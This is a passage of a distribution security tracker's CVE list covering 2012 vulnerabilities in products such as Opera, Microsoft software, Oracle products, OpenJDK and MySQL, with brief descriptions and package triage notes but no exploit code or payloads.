CVE-2012-1933 (Multiple PHP remote file inclusion vulnerabilities in Newscoop 3.5.x ...) - newscoop (bug #604113) CVE-2012-1932 RESERVED CVE-2007-6753 (Untrusted search path vulnerability in Shell32.dll in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2012-1931 (Opera before 11.62 on UNIX, when used in conjunction with an ...) NOT-FOR-US: Opera CVE-2012-1930 (Opera before 11.62 on UNIX uses world-readable permissions for ...) NOT-FOR-US: Opera CVE-2012-1929 (Opera before 11.62 on Mac OS X allows remote attackers to spoof the ...) NOT-FOR-US: Opera CVE-2012-1928 (Opera before 11.62 allows remote attackers to spoof the address field ...) NOT-FOR-US: Opera CVE-2012-1927 (Opera before 11.62 allows remote attackers to spoof the address field ...) NOT-FOR-US: Opera CVE-2012-1926 (Opera before 11.62 allows remote attackers to bypass the Same Origin ...) NOT-FOR-US: Opera CVE-2012-1925 (Opera before 11.62 does not ensure that a dialog window is placed on ...) NOT-FOR-US: Opera CVE-2012-1924 (Opera before 11.62 allows user-assisted remote attackers to trick ...) NOT-FOR-US: Opera CVE-2012-1923 (RealNetworks Helix Server and Helix Mobile Server 14.x before 14.3.x ...) NOT-FOR-US: RealNetworks Helix CVE-2012-1922 (Multiple cross-site request forgery (CSRF) vulnerabilities in Sitecom ...) NOT-FOR-US: Sitecom WLM-2501 CVE-2012-1921 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Sitecom CVE-2012-1920 (@Mail WebMail Client in AtMail Open-Source 1.04 and earlier allows ...) NOT-FOR-US: AtMail CVE-2012-1919 (CRLF injection vulnerability in mime.php in @Mail WebMail Client in ...) NOT-FOR-US: AtMail CVE-2012-1918 (Multiple directory traversal vulnerabilities in (1) compose.php and ...) NOT-FOR-US: AtMail CVE-2012-1917 (compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 ...) NOT-FOR-US: AtMail CVE-2012-1916 (@Mail WebMail Client in AtMail Open-Source before 1.05 allows remote ...) NOT-FOR-US: AtMail CVE-2007-6752 (** DISPUTED ** Cross-site request forgery (CSRF) vulnerability in ...) - drupal7 (unimportant) CVE-2012-1915 RESERVED CVE-2012-1914 RESERVED CVE-2012-1913 REJECTED CVE-2012-1912 (Cross-site scripting (XSS) vulnerability in preferences.php in PHP ...) NOT-FOR-US: PHP Address Book CVE-2012-1911 (Multiple SQL injection vulnerabilities in PHP Address Book 6.2.12 and ...) NOT-FOR-US: PHP Address Book CVE-2012-1910 (Bitcoin-Qt 0.5.0.x before 0.5.0.5; 0.5.1.x, 0.5.2.x, and 0.5.3.x ...) - bitcoin (windows-only, qt gui not built) CVE-2012-1909 (The Bitcoin protocol, as used in bitcoind before 0.4.4, wxBitcoin, ...) - bitcoin 0.6.0-1 CVE-2012-1908 (Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.3 ...) NOT-FOR-US: Splunk CVE-2012-1907 (The scanner engine in PrivaWall Antivirus 5.6 and earlier does not ...) NOT-FOR-US: PrivaWall Antivirus CVE-2012-1906 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...) {DSA-2451-1} - puppet 2.7.13-1 CVE-2012-1905 RESERVED CVE-2012-1904 (mp4fformat.dll in the QuickTime File Format plugin in RealNetworks ...) NOT-FOR-US: RealPlayer CVE-2012-1903 RESERVED CVE-2012-1902 (show_config_errors.php in phpMyAdmin 3.4.x before 3.4.10.2, when a ...) - phpmyadmin 4:3.4.10.2-1 (unimportant) CVE-2012-1901 (Multiple cross-site request forgery (CSRF) vulnerabilities in FlexCMS ...) NOT-FOR-US: FlexCMS CVE-2012-1900 (Cross-site request forgery (CSRF) vulnerability in admin/index.php in ...) NOT-FOR-US: RazorCMS CVE-2012-1899 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Webfolio CMS CVE-2012-1898 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Wolf CMS CVE-2012-1897 (Multiple cross-site request forgery (CSRF) vulnerabilities in Wolf CMS ...) NOT-FOR-US: Wolf CMS CVE-2012-1586 (mount.cifs in cifs-utils 2.6 allows local users to determine the ...) - cifs-utils 2:5.3-2 (low; bug #665923) [squeeze] - cifs-utils (Minor issue) CVE-2012-1896 (Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-1895 (The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-1894 (Microsoft Office for Mac 2011 uses world-writable permissions for the ...) NOT-FOR-US: Microsoft Office CVE-2012-1893 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1892 (Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio ...) NOT-FOR-US: Microsoft Visual Studio Team Foundation Server CVE-2012-1891 (Heap-based buffer overflow in Microsoft Data Access Components (MDAC) ...) NOT-FOR-US: Microsoft Data Access Components CVE-2012-1890 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1889 (Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses ...) NOT-FOR-US: Microsoft XML Core Services CVE-2012-1888 (Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 ...) NOT-FOR-US: Microsoft Visio CVE-2012-1887 (Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and ...) NOT-FOR-US: Microsoft Excel CVE-2012-1886 (Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1; Excel ...) NOT-FOR-US: Microsoft Excel CVE-2012-1885 (Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and ...) NOT-FOR-US: Microsoft Excel CVE-2012-1884 RESERVED CVE-2012-1883 RESERVED CVE-2012-1882 (Microsoft Internet Explorer 6 through 9 does not block cross-domain ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1881 (Microsoft Internet Explorer 8 and 9 does not properly handle objects ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1880 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1879 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1878 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1877 (Microsoft Internet Explorer 6 through 9 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1876 (Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1875 (Microsoft Internet Explorer 8 does not properly handle objects in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1874 (Microsoft Internet Explorer 8 and 9 does not properly handle objects ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1873 (Microsoft Internet Explorer 7 through 9 does not properly create and ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1872 (Cross-site scripting (XSS) vulnerability in Microsoft Internet ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1871 RESERVED CVE-2012-1870 (The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 ...) NOT-FOR-US: Microsoft Windows XP CVE-2012-1869 RESERVED CVE-2012-1868 (Race condition in the thread-creation implementation in win32k.sys in ...) NOT-FOR-US: Microsoft Windows XP CVE-2012-1867 (Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Windows Windows CVE-2012-1866 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1865 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1864 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1863 (Cross-site scripting (XSS) vulnerability in Microsoft Office ...) NOT-FOR-US: Microsoft Office CVE-2012-1862 (Open redirect vulnerability in Microsoft Office SharePoint Server 2007 ...) NOT-FOR-US: Microsoft SharePoint CVE-2012-1861 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...) NOT-FOR-US: Microsoft SharePoint CVE-2012-1860 (Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server ...) NOT-FOR-US: Microsoft SharePoint CVE-2012-1859 (Cross-site scripting (XSS) vulnerability in scriptresx.ashx in ...) NOT-FOR-US: Microsoft SharePoint CVE-2012-1858 (The toStaticHTML API (aka the SafeHTML component) in Microsoft ...) NOT-FOR-US: MicrosoftInternet Explorer, Communicator, Lync CVE-2012-1857 (Cross-site scripting (XSS) vulnerability in the Enterprise Portal ...) NOT-FOR-US: Microsoft Dynamics AX CVE-2012-1856 (The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in ...) NOT-FOR-US: Microsoft CVE-2012-1855 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-1854 (Untrusted search path vulnerability in VBE6.dll in Microsoft Office ...) NOT-FOR-US: Microsoft Office CVE-2012-1853 (Stack-based buffer overflow in the Remote Administration Protocol ...) NOT-FOR-US: Microsoft Windows XP CVE-2012-1852 (Heap-based buffer overflow in the Remote Administration Protocol (RAP) ...) NOT-FOR-US: Microsoft Windows XP CVE-2012-1851 (Format string vulnerability in the Print Spooler service in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2012-1850 (The Remote Administration Protocol (RAP) implementation in the ...) NOT-FOR-US: Microsoft Windows CVE-2012-1849 (Untrusted search path vulnerability in Microsoft Lync 2010, 2010 ...) NOT-FOR-US: Microsoft Lync, Attendee,, Attendant CVE-2012-1848 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1847 (Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; ...) NOT-FOR-US: Microsoft Excel CVE-2012-1846 (Google Chrome 17.0.963.66 and earlier allows remote attackers to ...) - chromium-browser 20.0.1132.21~r139451-1 CVE-2012-1845 (Use-after-free vulnerability in Google Chrome 17.0.963.66 and earlier ...) - chromium-browser 20.0.1132.21~r139451-1 CVE-2012-1844 (The Quantum Scalar i500 tape library with firmware before i7.0.3 ...) NOT-FOR-US: Quantum Scalar CVE-2012-1843 (Cross-site request forgery (CSRF) vulnerability in saveRestore.htm on ...) NOT-FOR-US: Quantum Scalar CVE-2012-1842 (Cross-site scripting (XSS) vulnerability in checkQKMProg.htm on the ...) NOT-FOR-US: Quantum Scalar CVE-2012-1841 (Absolute path traversal vulnerability in logShow.htm on the Quantum ...) NOT-FOR-US: Quantum Scalar CVE-2012-1840 (AjaXplorer 3.2.x before 3.2.5 and 4.0.x before 4.0.4 does not properly ...) NOT-FOR-US: AjaXplorer CVE-2012-1839 (Multiple directory traversal vulnerabilities in the Get Template ...) NOT-FOR-US: AjaXplorer CVE-2012-1838 (The web management interface on the LG-Nortel ELO GS24M switch allows ...) NOT-FOR-US: Nortel switch CVE-2012-1837 (The (1) webreports, (2) post/create-role, and (3) post/update-role ...) NOT-FOR-US: Tivoli CVE-2012-1836 (Heap-based buffer overflow in dns.cpp in InspIRCd 2.0.5 might allow ...) {DSA-2448-1} - inspircd 2.0.5-0.1 (bug #667914) CVE-2012-1835 (Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One ...) NOT-FOR-US: All-in-One Event Calendar plugin for WordPress CVE-2012-1834 RESERVED CVE-2012-1833 (VMware SpringSource Grails before 1.3.8, and 2.x before 2.0.2, does ...) NOT-FOR-US: Grails CVE-2012-1832 (WellinTech KingView 6.53 allows remote attackers to execute arbitrary ...) NOT-FOR-US: WellinTech KingView not in Debian CVE-2012-1831 (Heap-based buffer overflow in WellinTech KingView 6.53 allows remote ...) NOT-FOR-US: WellinTech KingView not in Debian CVE-2012-1830 (Stack-based buffer overflow in WellinTech KingView 6.53 allows remote ...) NOT-FOR-US: WellinTech KingView not in Debian CVE-2012-1829 (Multiple cross-site scripting (XSS) vulnerabilities in AutoFORM PDM ...) NOT-FOR-US: AutoFORM PDM Archive CVE-2012-1828 (The administrative functions in AutoFORM PDM Archive before 7.1 do not ...) NOT-FOR-US: AutoFORM PDM Archive CVE-2012-1827 (The web service in AutoFORM PDM Archive before 7.1 does not have ...) NOT-FOR-US: AutoFORM PDM Archive CVE-2012-1826 (dotCMS 1.9 before 1.9.5.1 allows remote authenticated users to execute ...) NOT-FOR-US: dotCMS not in Debian CVE-2012-1825 (Multiple cross-site scripting (XSS) vulnerabilities in the status ...) NOT-FOR-US: ForeScout CounterACT CVE-2012-1824 (Untrusted search path vulnerability in Measuresoft ScadaPro Client ...) NOT-FOR-US: Measuresoft ScadaPro CVE-2012-1823 (sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when ...) {DSA-2465-1} - php5 5.4.3-1 NOTE: http://ompldr.org/vZGxxaQ https://bugs.php.net/bug.php?id=61910 NOTE: 5.4.2-1 'fixed' this, but fix is incomplete: CVE-2012-2311 CVE-2012-1822 RESERVED CVE-2012-1821 (The Network Threat Protection module in the Manager component in ...) NOT-FOR-US: Symantec Endpoint Protection on Windows Server 2003 CVE-2012-1820 (The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and ...) {DSA-2497-1} - quagga 0.99.21-3 (bug #676510) CVE-2012-1819 (Untrusted search path vulnerability in WellinTech KingView 6.53 allows ...) NOT-FOR-US: WellinTech KingView CVE-2012-1818 (An unspecified ActiveX control in Emerson DeltaV and DeltaV ...) NOT-FOR-US: DeltaV (SCADA system) not in Debian CVE-2012-1817 (Buffer overflow in Emerson DeltaV and DeltaV Workstations 9.3.1, ...) NOT-FOR-US: DeltaV (SCADA system) not in Debian CVE-2012-1816 (PORTSERV.exe in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, ...) NOT-FOR-US: DeltaV (SCADA system) not in Debian CVE-2012-1815 (SQL injection vulnerability in Emerson DeltaV and DeltaV Workstations ...) NOT-FOR-US: DeltaV (SCADA system) not in Debian CVE-2012-1814 (Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV ...) NOT-FOR-US: DeltaV (SCADA system) not in Debian CVE-2012-1813 (eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows ...) NOT-FOR-US: C3-ilex EOScada CVE-2012-1812 (eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows ...) NOT-FOR-US: C3-ilex EOScada CVE-2012-1811 (EOSDataServer.exe in C3-ilex EOScada before 11.0.19.2 allows remote ...) NOT-FOR-US: C3-ilex EOScada CVE-2012-1810 (EOSCoreScada.exe in C3-ilex EOScada before 11.0.19.2 allows remote ...) NOT-FOR-US: C3-ilex EOScada CVE-2012-1809 (The web server in the ECOM Ethernet module in Koyo H0-ECOM, ...) NOT-FOR-US: Koyo ECOM CVE-2012-1808 (The web server in the ECOM Ethernet module in Koyo H0-ECOM, ...) NOT-FOR-US: Koyo ECOM CVE-2012-1807 (Cross-site scripting (XSS) vulnerability in the web server in the ECOM ...) NOT-FOR-US: Koyo ECOM CVE-2012-1806 (The ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, ...) NOT-FOR-US: Koyo ECOM CVE-2012-1805 (Buffer overflow in the ECOM Ethernet module in Koyo H0-ECOM, ...) NOT-FOR-US: Koyo ECOM CVE-2012-1804 (The OPC server in Progea Movicon before 11.3 allows remote attackers ...) NOT-FOR-US: Progea Movicon CVE-2012-1803 (RuggedCom Rugged Operating System (ROS) 3.10.x and earlier has a ...) NOT-FOR-US: RuggedCom Rugged Operating System CVE-2012-1802 (Buffer overflow in the embedded web server on the Siemens Scalance X ...) NOT-FOR-US: Siemens Scalance X CVE-2012-1801 (Multiple stack-based buffer overflows in (1) COM and (2) ActiveX ...) NOT-FOR-US: ABB WebWare CVE-2012-1800 (Stack-based buffer overflow in the Profinet DCP protocol ...) NOT-FOR-US: Siemens Scalance S CVE-2012-1799 (The web server on the Siemens Scalance S Security Module firewall S602 ...) NOT-FOR-US: Siemens Scalance S CVE-2012-1798 (The TIFFGetEXIFProperties function in coders/tiff.c in ImageMagick ...) {DSA-2462-1} - imagemagick 8:6.7.4.0-4 (bug #667635) CVE-2012-1797 (IBM DB2 9.5 uses world-writable permissions for nodes.reg, which has ...) NOT-FOR-US: IBM DB2 CVE-2012-1796 (Unspecified vulnerability in IBM Tivoli Monitoring Agent (ITMA), as ...) NOT-FOR-US: Tivoli CVE-2012-1795 (webglimpse.cgi in Webglimpse before 2.20.0 allows remote attackers to ...) NOT-FOR-US: Webglimpse CVE-2012-1794 RESERVED CVE-2012-1793 RESERVED CVE-2012-1792 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: OSCommerce Online Merchant CVE-2012-1791 RESERVED CVE-2012-1777 (SQL injection vulnerability in my.activation.php3 in F5 FirePass 6.0.0 ...) NOT-FOR-US: F5 Firepass CVE-2012-1776 (Multiple heap-based buffer overflows in VideoLAN VLC media player ...) - vlc 2.0.1-1 (low) CVE-2012-1775 (Stack-based buffer overflow in VideoLAN VLC media player before 2.0.1 ...) - vlc 2.0.1-1 (low) CVE-2011-5083 (Unrestricted file upload vulnerability in inc/swf/swfupload.swf in ...) - dotclear (low; bug #670227) NOTE: Post-authentication; vulnerability is actually in admin/media.php. CVE-2012-1790 (Absolute path traversal vulnerability in Webgrind 1.0 and 1.0.2 allows ...) NOT-FOR-US: Webgrind CVE-2012-1789 (Multiple cross-site scripting (XSS) vulnerabilities in Kongreg8 1.7.3 ...) NOT-FOR-US: Kongreg8 CVE-2012-1788 (Multiple cross-site scripting (XSS) vulnerabilities in wonderdesk.cgi ...) NOT-FOR-US: WonderDesk SQL CVE-2012-1787 (Multiple cross-site scripting (XSS) vulnerabilities in wgarcmin.cgi in ...) NOT-FOR-US: Webglimpse CVE-2012-1786 (The Media Upload form in the Video Embed & Thumbnail Generator plugin ...) NOT-FOR-US: Media Upload form in the Video Embed & Thumbnail Generator plugin for WordPress CVE-2012-1785 (kg_callffmpeg.php in the Video Embed & Thumbnail Generator plugin ...) NOT-FOR-US: Video Embed & Thumbnail Generator plugin for WordPress CVE-2012-1784 (SQL injection vulnerability in MyJobList 0.1.3 allows remote attackers ...) NOT-FOR-US: MyJobList CVE-2012-1783 (Tiny Server 1.1.9 and earlier allows remote attackers to cause a ...) NOT-FOR-US: Tiny Server CVE-2012-1782 (Multiple cross-site scripting (XSS) vulnerabilities in questions/ask ...) NOT-FOR-US: OSQA CVE-2012-1781 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: SocialCMS CVE-2012-1780 (SQL injection vulnerability in search.php in SocialCMS 1.0.5 allows ...) NOT-FOR-US: SocialCMS CVE-2012-1779 (Cross-site scripting (XSS) vulnerability in IDevSpot ...) NOT-FOR-US: IDevSpot idev-BusinessDirectory CVE-2012-1778 (SQL injection vulnerability in artykul_print.php in CreateVision CMS ...) NOT-FOR-US: CreateVision CMS CVE-2011-5082 (Cross-site scripting (XSS) vulnerability in the s2Member Pro plugin ...) NOT-FOR-US: s2Member Pro plugin for WordPress CVE-2010-5086 (Directory traversal vulnerability in wiki/rankings.php in Bitweaver ...) NOT-FOR-US: Bitweaver CVE-2009-5114 (Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 ...) NOT-FOR-US: WebGlimpse CVE-2009-5113 (Cross-site scripting (XSS) vulnerability in wgarcmin.cgi in WebGlimpse ...) NOT-FOR-US: WebGlimpse CVE-2009-5112 (wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers ...) NOT-FOR-US: WebGlimpse CVE-2012-1774 (Unspecified vulnerability in the Open URL feature in Gretech GOM Media ...) NOT-FOR-US: Gretech GOM Media Player CVE-2012-1773 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1772 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1771 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1770 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1769 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1768 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1767 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1766 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1765 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Sun Solaris 10 CVE-2012-1764 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-1763 (Unspecified vulnerability in the Oracle Clinical/Remote Data Capture ...) NOT-FOR-US: Oracle Industry Applications CVE-2012-1762 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-1761 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1760 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1759 (Unspecified vulnerability in the Oracle AutoVue component in Oracle ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-1758 (Unspecified vulnerability in the Oracle AutoVue component in Oracle ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-1757 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-1756 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-1755 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-1754 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1753 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-1752 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris 11 CVE-2012-1751 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-1750 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Oracle Sun Solaris 8, 9, 10, and 11 CVE-2012-1749 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1748 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products 9.1 CVE-2012-1747 (Unspecified vulnerability in the Network Layer component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-1746 (Unspecified vulnerability in the Network Layer component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-1745 (Unspecified vulnerability in the Network Layer component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-1744 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1743 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture ...) NOT-FOR-US: Oracle Industry Applications CVE-2012-1742 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1741 (Unspecified vulnerability in the Enterprise Manager for Fusion ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1740 (Unspecified vulnerability in the Oracle Application Express Listener ...) NOT-FOR-US: Oracle Application Express Listener CVE-2012-1739 (Unspecified vulnerability in the Oracle E-Business Intelligence ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-1738 (Unspecified vulnerability in the Oracle iPlanet Web Server component ...) NOT-FOR-US: Oracle Sun Products Suite, iPlanet Web Server CVE-2012-1737 (Unspecified vulnerability in the Enterprise Manager for Oracle ...) NOT-FOR-US: Oracle CVE-2012-1736 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1735 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-1734 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, ...) {DSA-2496-1} - mysql-5.1 (bug #682212) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-1733 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-1732 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1731 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1730 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-1729 (Unspecified vulnerability in the Hyperion BI+ component in Oracle ...) NOT-FOR-US: Oracle Hyperion CVE-2012-1728 (Unspecified vulnerability in the Oracle Siebel CRM 8.1.1 and 8.2.2 ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1727 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-1726 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1725 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1724 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1723 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1722 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (specific to Oracle Java) - openjdk-7 (specific to Oracle Java) CVE-2012-1721 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (specific to Oracle Java) - openjdk-7 (specific to Oracle Java) CVE-2012-1720 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java on Solaris) - openjdk-7 (Only affects Java on Solaris) CVE-2012-1719 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1718 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1717 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1716 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1715 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-1714 (Unspecified vulnerability in a TList 6 ActiveX control in Oracle ...) NOT-FOR-US: Oracle Hyperion Financial Management CVE-2012-1713 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1712 (Directory traversal vulnerability in the Liferay component in Oracle ...) NOT-FOR-US: Oracle Sun GlassFish Web Space Server CVE-2012-1711 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2507-1} - openjdk-6 6b24-1.11.3-1 (bug #677487) - openjdk-7 7~u3-2.1.1-1 (bug #677486) CVE-2012-1710 (Unspecified vulnerability in the Oracle WebCenter Forms Recognition ...) NOT-FOR-US: Oracle Fusion CVE-2012-1709 (Unspecified vulnerability in the Oracle WebCenter Forms Recognition ...) NOT-FOR-US: Oracle Fusion CVE-2012-1708 (Unspecified vulnerability in the Application Express component in ...) NOT-FOR-US: Oracle Database CVE-2012-1707 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-1706 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle 